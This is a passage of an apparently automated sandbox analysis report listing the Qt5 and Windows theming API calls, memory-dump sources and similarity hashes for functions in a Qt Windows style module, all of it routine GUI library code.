                                                                                                                                                                                                                • ?subControlRect@QCommonStyle@@UEBA?AVQRect@@W4ComplexControl@QStyle@@PEBVQStyleOptionComplex@@W4SubControl@4@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF2440A
                                                                                                                                                                                                                • ?visualRect@QStyle@@SA?AVQRect@@W4LayoutDirection@Qt@@AEBV2@1@Z.QT5WIDGETS ref: 00007FFAFDF2441E
                                                                                                                                                                                                                • ?visualRect@QStyle@@SA?AVQRect@@W4LayoutDirection@Qt@@AEBV2@1@Z.QT5WIDGETS ref: 00007FFAFDF24961
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style@@$Rect@Rect@@$?sub?visualCommonComplexComplex@@ControlControl@Control@4@Direction@LayoutOptionQt@@StyleV2@1@Widget@@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2058851883-0
                                                                                                                                                                                                                • Opcode ID: d89975f9fa6c6547f81844f9f662d6da913d68b431cc841e8c7c24e72d5bc9ef
                                                                                                                                                                                                                • Instruction ID: 3cee64a4e9752cf0147a761a361d87c626d50137e357ac5acc344c315f7b60f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d89975f9fa6c6547f81844f9f662d6da913d68b431cc841e8c7c24e72d5bc9ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9812D572E182428AE726CF78D404ABD37A0FB56369F008136CA3E57AD4EE7CE445C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Icon@@$Painter@@$Brush@@Rect@@$Color@@Style@@$?proxy@ColorObject@@$?adjusted@Widget@@$?actual?brush@?cache?cast@?color@?darker@?set?translate@?windowF@@@FontGroup@1@Icon@Key@MetaMetrics@@Mode@1@Palette@@PointQt@@Role@1@@Size@Size@@State@1@@String@@V2@@Window@$?draw?elided?font?rotate@?transposed@?visualApplication@@BrushBrush@Brush@@@Color@@@Direction@ElideFont@@LayoutMetrics@Mode@Pen@Qt@@@Rect@Rects@Style@TextText@V2@1@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2698851743-0
                                                                                                                                                                                                                • Opcode ID: 4713cbdeb7ecafa310ba5c18e6376e1af6384a3c5bd12de68f54f25cd3d5b84f
                                                                                                                                                                                                                • Instruction ID: ccc85a900342292a2c117d6e0cfb32c34982e5026a876b198f05d93258ab2ca5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4713cbdeb7ecafa310ba5c18e6376e1af6384a3c5bd12de68f54f25cd3d5b84f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F19332A087828AD722CF65E8545AD7770FB46BA5F00813ADE6E1BB98EF3CD145C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@$Painter@@Pen@@$Rect@@$ColorColor@@Style@$?draw?setPen@Pen@@@Style$?adjusted@?brush@?color@Animation@@BrushGroup@1@Image@Image@@JoinObject@@Palette@@Qt@@Qt@@@Rects@Role@1@@Style@3@Style@3@@$?animation@?cast@?current?pen@BlendCommonImage@@@MetaObject@@@Private@@V0@@V2@@
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 488949793-2766056989
                                                                                                                                                                                                                • Opcode ID: 1323692698e6a1aa2d82c1927648a39a50013004746813ab53a32a3d5e4be323
                                                                                                                                                                                                                • Instruction ID: 8aac584e5a32f6bc03b7a45c637f9a43ff0cac95fc1fc09611244220cdda4411
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1323692698e6a1aa2d82c1927648a39a50013004746813ab53a32a3d5e4be323
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B81A731A1864286EB128F25E81496A7760FB477B9F408136DD7E0BBE4EF3DD145C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@$Pen@@$Painter@@$ColorColor@@Rect@@Style@$?setPen@Pen@@@Widget@@$?brush@?color@?draw?inherits@?parentBrushGroup@1@JoinObject@@Palette@@Point@@0@Qt@@Qt@@@Rects@Role@1@@Style@3@Style@3@@Widget@$?pen@V0@@Window@
                                                                                                                                                                                                                • String ID: @$QAbstractItemView$QLineEdit
                                                                                                                                                                                                                • API String ID: 926540561-255154090
                                                                                                                                                                                                                • Opcode ID: 6abdf0a445f71498796ade97e5a14a468677f0b2c30fa9c9b0716940efc28457
                                                                                                                                                                                                                • Instruction ID: de34ed6bf7d97917c1c346b45eeef1657e400e90994e53d30b934f568d8d908e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6abdf0a445f71498796ade97e5a14a468677f0b2c30fa9c9b0716940efc28457
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0471963260868286DB12CF14E454A6AB770FF87766F408032DA7E5B7A4EF3DE549CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetThemeEnumValue.UXTHEME ref: 00007FFAFDF1FD64
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?getHWNDForWidget@QApplicationPrivate@@SAPEAUHWND__@@PEBVQWidget@@@Z.QT5WIDGETS(?,00000004,00000002,?,?,00000000,00007FFAFDF197AA), ref: 00007FFAFDF21228
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?allWindows@QGuiApplication@@SA?AV?$QList@PEAVQWindow@@@@XZ.QT5GUI(?,00000004,00000002,?,?,00000000,00007FFAFDF197AA), ref: 00007FFAFDF21242
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?isTopLevel@QWindow@@QEBA_NXZ.QT5GUI ref: 00007FFAFDF21276
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ.QT5GUI ref: 00007FFAFDF21283
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?handle@QWindow@@QEBAPEAVQPlatformWindow@@XZ.QT5GUI ref: 00007FFAFDF21291
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: GetDesktopWindow.USER32 ref: 00007FFAFDF212A9
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFAFDF212E3
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFAFDF21366
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFAFDF21376
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: OpenThemeData.UXTHEME ref: 00007FFAFDF213DD
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FFAFDF2140F
                                                                                                                                                                                                                • GetThemeInt.UXTHEME ref: 00007FFAFDF1FDA0
                                                                                                                                                                                                                • ??0QColor@@QEAA@I@Z.QT5GUI ref: 00007FFAFDF1FDD0
                                                                                                                                                                                                                • ?pen@QPainter@@QEBAAEBVQPen@@XZ.QT5GUI ref: 00007FFAFDF1FDD9
                                                                                                                                                                                                                • ??0QPen@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFAFDF1FDE7
                                                                                                                                                                                                                • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFAFDF1FDF7
                                                                                                                                                                                                                • ?color@QBrush@@QEBAAEBVQColor@@XZ.QT5GUI ref: 00007FFAFDF1FE00
                                                                                                                                                                                                                • ??0QBrush@@QEAA@AEBVQColor@@W4BrushStyle@Qt@@@Z.QT5GUI ref: 00007FFAFDF1FE11
                                                                                                                                                                                                                • ??0QPen@@QEAA@AEBVQBrush@@NW4PenStyle@Qt@@W4PenCapStyle@3@W4PenJoinStyle@3@@Z.QT5GUI ref: 00007FFAFDF1FE3B
                                                                                                                                                                                                                • ?setPen@QPainter@@QEAAXAEBVQPen@@@Z.QT5GUI ref: 00007FFAFDF1FE47
                                                                                                                                                                                                                • ??1QPen@@QEAA@XZ.QT5GUI ref: 00007FFAFDF1FE52
                                                                                                                                                                                                                • ??1QBrush@@QEAA@XZ.QT5GUI ref: 00007FFAFDF1FE5D
                                                                                                                                                                                                                • ?dpi@QStyleHelper@@YANPEBVQStyleOption@@@Z.QT5WIDGETS ref: 00007FFAFDF1FE66
                                                                                                                                                                                                                • ?dpiScaled@QStyleHelper@@YANNN@Z.QT5WIDGETS ref: 00007FFAFDF1FE7A
                                                                                                                                                                                                                • ?dpiScaled@QStyleHelper@@YANNN@Z.QT5WIDGETS ref: 00007FFAFDF1FE92
                                                                                                                                                                                                                • ??0QRectF@@QEAA@AEBVQRect@@@Z.QT5CORE ref: 00007FFAFDF1FEA3
                                                                                                                                                                                                                • ?drawRects@QPainter@@QEAAXPEBVQRectF@@H@Z.QT5GUI ref: 00007FFAFDF1FEE1
                                                                                                                                                                                                                • ??0QBrush@@QEAA@AEBVQColor@@W4BrushStyle@Qt@@@Z.QT5GUI ref: 00007FFAFDF1FEF6
                                                                                                                                                                                                                • ??0QPen@@QEAA@AEBVQBrush@@NW4PenStyle@Qt@@W4PenCapStyle@3@W4PenJoinStyle@3@@Z.QT5GUI ref: 00007FFAFDF1FF1C
                                                                                                                                                                                                                • ?setPen@QPainter@@QEAAXAEBVQPen@@@Z.QT5GUI ref: 00007FFAFDF1FF28
                                                                                                                                                                                                                • ??1QPen@@QEAA@XZ.QT5GUI ref: 00007FFAFDF1FF33
                                                                                                                                                                                                                • ??1QBrush@@QEAA@XZ.QT5GUI ref: 00007FFAFDF1FF3E
                                                                                                                                                                                                                • ??0QRectF@@QEAA@AEBVQRect@@@Z.QT5CORE ref: 00007FFAFDF1FF4C
                                                                                                                                                                                                                • ?drawRects@QPainter@@QEAAXPEBVQRectF@@H@Z.QT5GUI ref: 00007FFAFDF1FF7C
                                                                                                                                                                                                                • ?setPen@QPainter@@QEAAXAEBVQPen@@@Z.QT5GUI ref: 00007FFAFDF1FF8A
                                                                                                                                                                                                                • ??1QPen@@QEAA@XZ.QT5GUI ref: 00007FFAFDF1FF95
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@$Pen@@$Painter@@$Color@@RectStyleStyle@Window@@$?setHelper@@Pen@Pen@@@Qt@@Theme$?dpi?drawBrushColorJoinLogger@@MessageQt@@@Rect@@@Rects@Scaled@Style@3@Style@3@@Window$?all?brush@?color@?dispose@?dpi@?get?handle@?pen@?type@?warning@ApplicationApplication@@Array@@Bit@ByteD__@@DataData@1@@Data@@DesktopEnumGroup@1@Level@ListList@Local8OpenOption@@@Palette@@PlatformPrivate@@Role@1@@String@@Type@V0@@ValueWidget@Widget@@@Window@@@@Windows@
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 2773325225-2766056989
                                                                                                                                                                                                                • Opcode ID: af2a0e4601ee2abb478fd70928de5170b491ff5a9deb5bb6c37dc52e57a42274
                                                                                                                                                                                                                • Instruction ID: ccc6335e5c3396c86acbd1ef5b7c797aa7b4456069627482ee29e1a8dbec6b0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af2a0e4601ee2abb478fd70928de5170b491ff5a9deb5bb6c37dc52e57a42274
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F810C22A18B4286E712CF35E8445697760FF9B7A5F408233DE6D276A4EF3CD189C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window@@$Logger@@MessageWindow$?all?dispose@?get?handle@?type@?warning@ApplicationApplication@@Array@@Bit@ByteD__@@DataData@1@@Data@@DesktopLevel@ListList@Local8OpenPlatformPrivate@@Qt@@String@@ThemeType@Widget@Widget@@@Window@@@@Windows@
                                                                                                                                                                                                                • String ID: Invalid parameters #%d, %p$OpenThemeData() failed for theme %d (%s).$SetWindowTheme() failed.$Unable to create the treeview helper window.$explorer
                                                                                                                                                                                                                • API String ID: 4090762318-2680742128
                                                                                                                                                                                                                • Opcode ID: af33dac452b3077cee02e1a0ea4967488e972aa9edb95271b0aad700492b3f4f
                                                                                                                                                                                                                • Instruction ID: a80dc902ff30f0be4a102ecde8ee89364093e7a83b90220237df247d2486876e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af33dac452b3077cee02e1a0ea4967488e972aa9edb95271b0aad700492b3f4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B716122E09B4281EB628B11E440B7933A1EF97B62F448136C97D8A7D4FF3CE545C3A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25031
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?setWindowOpacity@QWidget@@QEAAXN@Z.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25047
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: IsThemeActive.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25058
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: IsAppThemed.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25062
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2506C
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25077
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: SelectObject.GDI32 ref: 00007FFAFDF250C7
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: DeleteObject.GDI32 ref: 00007FFAFDF250D4
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: DeleteDC.GDI32 ref: 00007FFAFDF250ED
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: IsThemeActive.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25117
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: IsAppThemed.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25121
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2512B
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25136
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: memset.VCRUNTIME140(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2516D
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25186
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2519F
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25010: ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF251B8
                                                                                                                                                                                                                • ?stopAnimation@QCommonStylePrivate@@QEBAXPEBVQObject@@@Z.QT5WIDGETS ref: 00007FFAFDF18E04
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18E14
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18E2D
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18E46
                                                                                                                                                                                                                • ?setAttribute@QWidget@@QEAAXW4WidgetAttribute@Qt@@_N@Z.QT5WIDGETS ref: 00007FFAFDF18E5B
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18E7B
                                                                                                                                                                                                                • ?setAttribute@QWidget@@QEAAXW4WidgetAttribute@Qt@@_N@Z.QT5WIDGETS ref: 00007FFAFDF18E94
                                                                                                                                                                                                                • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFAFDF18EBD
                                                                                                                                                                                                                • ?qt_qFindChild_helper@@YAPEAVQObject@@PEBV1@AEBVQString@@AEBUQMetaObject@@V?$QFlags@W4FindChildOption@Qt@@@@@Z.QT5CORE ref: 00007FFAFDF18ED7
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFDF18EE4
                                                                                                                                                                                                                • ?setContentsMargins@QWidget@@QEAAXHHHH@Z.QT5WIDGETS ref: 00007FFAFDF18F06
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18F26
                                                                                                                                                                                                                • ?viewport@QAbstractScrollArea@@QEBAPEAVQWidget@@XZ.QT5WIDGETS ref: 00007FFAFDF18F34
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF18F4C
                                                                                                                                                                                                                • ?font@QApplication@@SA?AVQFont@@PEBD@Z.QT5WIDGETS ref: 00007FFAFDF18F66
                                                                                                                                                                                                                • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFAFDF18F78
                                                                                                                                                                                                                • ?family@QFont@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFAFDF18F86
                                                                                                                                                                                                                • ?setFamily@QFont@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFAFDF18F93
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFDF18F9D
                                                                                                                                                                                                                • ?setFont@QWidget@@QEAAXAEBVQFont@@@Z.QT5WIDGETS ref: 00007FFAFDF18FAA
                                                                                                                                                                                                                • ??1QFont@@QEAA@XZ.QT5GUI ref: 00007FFAFDF18FB4
                                                                                                                                                                                                                • ??1QFont@@QEAA@XZ.QT5GUI ref: 00007FFAFDF18FBE
                                                                                                                                                                                                                • ?setAttribute@QWidget@@QEAAXW4WidgetAttribute@Qt@@_N@Z.QT5WIDGETS ref: 00007FFAFDF18FDE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object@@$Meta$?cast@V2@@$?setWidget@@$Attribute@Font@@$String@@$Application@@Private@@Qt@@_StyleWidget$?instance@ActiveCoreDarkDeleteFindMode@ObjectString@@@ThemeThemedWindows$?family@?font@?qt_q?stop?viewport@AbstractAnimation@Area@@ChildChild_helper@@CommonContentsFamily@Flags@Font@Font@@@Latin1Margins@Object@@@Opacity@Option@Qt@@@@@ScrollSelectV0@@Windowmemset
                                                                                                                                                                                                                • String ID: QCommandLinkButton$qt_inputdlg_buttonbox$qt_msgbox_buttonbox
                                                                                                                                                                                                                • API String ID: 1264395382-279060725
                                                                                                                                                                                                                • Opcode ID: 90f386b7e4906de7370b93bb41d607c9e84e887ffcc9fb3f9d8b4275722e03d4
                                                                                                                                                                                                                • Instruction ID: 9dcfcd7aff50bedb4edc303ba0feba641141706112f3ccac04b8edf6edc54a9c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90f386b7e4906de7370b93bb41d607c9e84e887ffcc9fb3f9d8b4275722e03d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8515131A18A4292EF028F21D9559793361FF47BA6B049436DD3D0BBA4EF3CE149C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25031
                                                                                                                                                                                                                • ?setWindowOpacity@QWidget@@QEAAXN@Z.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25047
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19340: CloseThemeData.UXTHEME(?,?,?,?,?,?,?,00007FFAFDF1136A), ref: 00007FFAFDF19368
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF19340: DestroyWindow.USER32(?,?,?,?,?,?,?,00007FFAFDF1136A), ref: 00007FFAFDF19386
                                                                                                                                                                                                                • IsThemeActive.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25058
                                                                                                                                                                                                                • IsAppThemed.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25062
                                                                                                                                                                                                                • ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2506C
                                                                                                                                                                                                                • ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25077
                                                                                                                                                                                                                • SelectObject.GDI32 ref: 00007FFAFDF250C7
                                                                                                                                                                                                                • DeleteObject.GDI32 ref: 00007FFAFDF250D4
                                                                                                                                                                                                                • DeleteDC.GDI32 ref: 00007FFAFDF250ED
                                                                                                                                                                                                                • IsThemeActive.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25117
                                                                                                                                                                                                                • IsAppThemed.UXTHEME(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25121
                                                                                                                                                                                                                • ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2512B
                                                                                                                                                                                                                • ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25136
                                                                                                                                                                                                                • memset.VCRUNTIME140(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2516D
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF25186
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF2519F
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,00007FFAFDF18DFD), ref: 00007FFAFDF251B8
